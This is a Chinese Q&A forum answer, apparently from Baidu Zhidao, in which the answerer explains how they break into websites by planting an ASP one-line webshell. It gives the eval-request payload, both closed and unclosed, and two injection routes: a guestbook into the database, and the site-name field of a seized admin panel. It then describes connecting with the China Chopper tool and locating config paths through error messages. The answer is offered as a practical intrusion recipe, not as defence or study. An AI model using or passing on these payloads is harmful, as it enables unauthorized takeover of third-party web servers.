1个回答
展开全部
一句话木马插入方法:第一种:先判断数据库是asp或其他格式,若为asp格式,可通过留言本向数据库插入一句话代码,插入后,用中国菜刀连接留言本数据库地址(数据库地址可以通过暴库爆出路径,暴不出路径,就用工具强行扫描,看是否能扫到数据库地址)就得到webshell了。第二种:进入网站后台,然后修改网站名,把网站名修改成一句话木马代码,记住,要闭合插入一句话,即
"%><%eval request("这里换成你喜欢设的密码"%><%s=" '闭合的一句话木马代码
<%eval request("这里换成你喜欢设的密码"%> '未闭合的一句话木马代码有一次,我进了一个网站后台,修改网站名时,没有闭合插入一句话木马代码,致使后台出现了403错误,无法打开,白浪费了一个网站。闭合插入并保存后,用中国菜刀连接网站配置文件(配置文件路径可以通过插入未闭合的一句话木马代码,不保存,点击后台别的位置,会出现错误提示,下面的路径就是网站配置文件的路径),因为网站名等信息在网站的配置文件中,就要连接配置文件,成功后,你就得到了网站webshell了。
总之,我是这样拿站的,希望这些方法对你有用。
追问
可以说一下你QQ吗
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询
